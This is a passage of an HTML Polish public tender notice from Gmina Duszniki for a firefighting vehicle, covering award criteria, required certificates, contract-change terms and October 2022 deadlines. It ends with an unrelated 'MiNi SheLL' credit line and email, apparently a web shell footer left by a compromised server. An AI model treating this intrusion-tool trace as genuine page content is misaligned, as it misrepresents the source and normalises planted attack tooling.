class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XXII. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu – tj. ofert wobec, których nie zachodzą przesłanki określone w<br/>art. 226 ustawy Pzp.<br/>2. Zamawiający dokona oceny ofert na podstawie następujących kryteriów:<br/>L.p. Nazwa kryterium Znaczenie kryterium<br/>(waga)<br/>1. Cena (C) 60%<br/>2. Pojemność zbiornika na wodę (ZW) 40%<br/>1) Liczba punktów w kryterium cena (C) 60%- Zamawiający zastosuje matematyczne obliczenie, ocena punktowa (maksymalnie<br/>Wykonawca może otrzymać 60 pkt) zostanie wyliczona zgodnie z następującą formułą:<br/>Proporcje matematyczne wg wzoru:<br/>C = cena najniższa/cena badanej oferty x 100 􀀀 60%<br/>gdzie:<br/>C - ilość punktów<br/>Przy ocenie wysokości proponowanej ceny najwyżej będzie punktowana oferta proponująca najniższą cenę brutto wykonania<br/>przedmiotu zamówienia.<br/>Oferta o najniższej cenie brutto – maksymalna ilość punktów, pozostałe oferty – ilość punktów wyliczona według wzoru;<br/>2) Liczba punktów w kryterium pojemność zbiornika na wodę (WA) 40%- wartość punktowa (maksymalnie Wykonawca może<br/>otrzymać 40 pkt) zostanie wyliczona następująco: poszczególnym ofertom zostaną przyznane punkty za oferowaną pojemność<br/>zbiornika<br/>na wodę:<br/>a) pojemność zbiornika na wodę do 2,5 m3 włącznie – 0 pkt, b) pojemność zbiornika na wodę powyżej 2,5 m3 – 40 pkt.<br/>3. Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać wyjaśnień dotyczących treści złożonych ofert, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pojemność zbiornika na wodę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.2. Wykaz podmiotowych<br/>środków dowodowych (oświadczeń) wymaganych od Wykonawcy, w celu potwierdzenia braku podstaw wykluczenia z<br/>postępowania:<br/>1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ppkt 2.1. rozdziału XIV SWZ<br/>oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust.<br/>1 pkt 4 ustawy Pzp, którego wzór stanowi załącznik nr 4 do SWZ;<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej: składa oświadczenie, o<br/>którym mowa w ppkt 3.2.1) rozdziału XIV SWZ;<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie,<br/>o którym mowa w ppkt. 3.2.1) rozdziału XIV SWZ, składa odrębnie każdy z Wykonawców;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2.5. Do oferty Wykonawca dołącza następujące przedmiotowe środki dowodowe:<br/>1) Zamawiający wymaga w niniejszym postępowaniu przedmiotowego środka dowodowego<br/>w postaci wypełnionej i załączonej do oferty tabeli pn. Opis oferowanych parametrów, której wzór stanowi załącznik nr 1 do<br/>Formularza Oferty wraz z dokumentami wymienionymi w opisie oferowanych parametrów, w tym:<br/>􀀀 aktualne i ważne świadectwo dopuszczenia/certyfikat do użytkowania w ochronie przeciwpożarowej na terenie Polski<br/>wydane na podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20.06.2007 r. w sprawie wykazu<br/>wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad<br/>wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U.<br/>z 2007 r. Nr 143, poz. 1002, z późn. zm) – powyższe dotyczy również sprzętu dostarczonego z oferowanym pojazdem, jeśli<br/>jest dla niego wymagane świadectwo dopuszczenia;<br/>􀀀 w przypadku pojazdu sprowadzonego z zagranicy, aktualną opinię techniczną w zakresie spełnienia wymagań technicznoużytkowych,<br/>wydaną przez Centrum Naukowo-Badawcze Ochrony Przeciwpożarowej – PIB w Józefowie, na podstawie<br/>rozporządzenia Ministra Spraw Wewnętrznych i Administracji z 21.10.2020 r. w sprawie wprowadzania do użytkowania w<br/>jednostkach ochrony przeciwpożarowej pojazdów pożarniczych używanych poza granicami kraju (Dz.U. z 2020 r., poz.<br/>1878);<br/>Zamawiający na podstawie ww. dokumentów dokona oceny zgodności oferowanego pojazdu<br/>z minimalnymi wymaganiami Zamawiającego zawartymi w szczegółowym opisie przedmiotu zamówienia, stanowiącym<br/>załącznik nr 1 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2.5. Do oferty Wykonawca dołącza następujące przedmiotowe środki dowodowe:<br/>1) Zamawiający wymaga w niniejszym postępowaniu przedmiotowego środka dowodowego<br/>w postaci wypełnionej i załączonej do oferty tabeli pn. Opis oferowanych parametrów, której wzór stanowi załącznik nr 1 do<br/>Formularza Oferty wraz z dokumentami wymienionymi w opisie oferowanych parametrów, w tym:<br/>􀀀 aktualne i ważne świadectwo dopuszczenia/certyfikat do użytkowania w ochronie przeciwpożarowej na terenie Polski<br/>wydane na podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20.06.2007 r. w sprawie wykazu<br/>wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad<br/>wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U.<br/>z 2007 r. Nr 143, poz. 1002, z późn. zm) – powyższe dotyczy również sprzętu dostarczonego z oferowanym pojazdem, jeśli<br/>jest dla niego wymagane świadectwo dopuszczenia;<br/>􀀀 w przypadku pojazdu sprowadzonego z zagranicy, aktualną opinię techniczną w zakresie spełnienia wymagań technicznoużytkowych,<br/>wydaną przez Centrum Naukowo-Badawcze Ochrony Przeciwpożarowej – PIB w Józefowie, na podstawie<br/>rozporządzenia Ministra Spraw Wewnętrznych i Administracji z 21.10.2020 r. w sprawie wprowadzania do użytkowania w<br/>jednostkach ochrony przeciwpożarowej pojazdów pożarniczych używanych poza granicami kraju (Dz.U. z 2020 r., poz.<br/>1878);<br/>Zamawiający na podstawie ww. dokumentów dokona oceny zgodności oferowanego pojazdu<br/>z minimalnymi wymaganiami Zamawiającego zawartymi w szczegółowym opisie przedmiotu zamówienia, stanowiącym<br/>załącznik nr 1 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Ofertę składa się na Formularzu Oferty (wraz z załącznikiem nr 1 do formularza tj. Opis oferowanych parametrów),<br/>którego wzór stanowi załącznik nr 2 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie, o którym mowa pkt 2 rozdziału XIV SWZ – tj. oświadczenie według wzoru załącznika nr 3 do SWZ,<br/>2) przedmiotowe środki dowodowe, o których mowa w pkt 2.5 rozdziału XIV SWZ,<br/>3) dokumenty potwierdzające posiadanie pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych<br/>dokumentów rejestrowych (tzn. odpowiednie pełnomocnictwa – jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> XI. Informacja dla Wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1. Wykonawcy mogą wspólnie (np. konsorcja, spółki cywilne) ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielnie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Uwaga ! Pełnomocnictwo powinno być załączone do oferty. Pełnomocnictwo składa się<br/>w oryginale, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby udzielającej pełnomocnictwa lub w<br/>postacie elektronicznej kopii dokumentu, poświadczonej za zgodność z oryginałem przez notariusza, tj. opatrzona<br/>kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>2. Zapis z pkt 2 powyżej nie dotyczy sytuacji, w której upoważnienie/pełnomocnictwo do występowania w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia wynika z dołączonej do oferty umowy regulującej<br/>współpracę Wykonawców – wówczas umowa winna być załączona do oferty w formie elektronicznej/postaci<br/>elektronicznej/postaci elektronicznej kopii dokumentu opatrzonej właściwymi podpisami wym. w uwadze pkt 2 powyżej, bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (tj. przez każdego z Wykonawców<br/>lub pełnomocnika).<br/>4. Przepisy ustawy Pzp i postanowienia niniejszej SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, w szczególności:<br/>1) oświadczenia i dokumenty (podmiotowe i przedmiotowe środki dowodowe), o których mowa w rozdziale XIV SWZ, składa<br/>każdy z Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia; oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. W przypadku gdy Zamawiający będzie wymagał wniesienia wadium, dopuszcza się, aby wadium zostało wniesione przez<br/>pełnomocnika (lidera) lub jednego z Wykonawców wspólnie ubiegających się o udzielnie zamówienia.<br/>6. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 445 ust. 1 ustawy Pzp, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 7<br/>1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Dopuszcza się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, mających na celu prawidłową realizację przedmiotu zamówienia, w następujących przypadkach:<br/>1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy – w<br/>zakresie objętym zmianą, w szczególności<br/>w zakresie zmiany stawki podatku VAT;<br/>2) gdy zmiany będą korzystne dla Zamawiającego i będą leżały w interesie publicznym;<br/>3) dopuszcza się poprawę omyłek pisarskich i rachunkowych w treści umowy;<br/>4) innych warunków umowy, jeżeli w chwili jej zawarcia nieznane były fakty mające na nie wpływ, przy jednoczesnym<br/>założeniu, że zakres spowoduje następstwa korzystne dla Zamawiającego,<br/>5) dopuszcza się zmianę terminu wykonania umowy, poza sytuacjami określonymi wyżej, również w przypadkach:<br/>􀀀 działania siły wyższej, klęski żywiołowej, nietypowych zjawisk atmosferycznych, sytuacji nadzwyczajnych np. ogłoszenia<br/>stanu epidemii, zagrożenia epidemicznego, stanu wyjątkowego – termin wykonania przedmiotu umowy może wówczas<br/>zostać przedłużony o czas trwania okoliczności, które znacznie utrudniają lub uniemożliwiają realizację umowy w pierwotnie<br/>założonym terminie;<br/>􀀀 wystąpienia okoliczności niezależnych od Wykonawcy (przy zachowaniu przez niego należytej staranności), skutkujących<br/>niemożliwością dotrzymania terminu zakończenia przedmiotu umowy – o czas trwania tych okoliczności;<br/>6) wynagrodzenie należne wykonawcy może ulec zmianie w przypadku zmiany:<br/>􀀀 stawki podatku od towarów i usług – wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie<br/>wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;<br/>3. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany niniejszej umowy następujące zmiany:<br/>a) danych teleadresowych;<br/>b) danych rejestrowych;<br/>c) będące następstwem sukcesji uniwersalnej po jednej ze stron niniejszej umowy.<br/>O powyższych zmianach Strona umowy, której zmiany dotyczą zobowiązuje się powiadomić pisemnie drugą Stronę.<br/>4. Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do udokumentowania zaistnienia<br/>okoliczności, o których mowa w ust. 2. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.<br/>5. Zmiany umowy wymaga formy pisemnej pod rygorem nieważności.<br/>6. Warunkiem wprowadzenia zmian do umowy jest zgoda obu stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_duszniki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę/Wykonawców <br/>w przypadkach, o których mowa w art. 108 ust. 1 ustawy Pzp (przesłanki wykluczenia obligatoryjne), oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2022r. poz. 835 ze zm.) – przesłanki wykluczenia obligatoryjne.<br/>4.	W przypadku Wykonawcy lub wykluczonego na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2022r. poz. 835 ze zm.), zastosowanie mają przepisy art. 7 ust. 2-9 niniejszej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com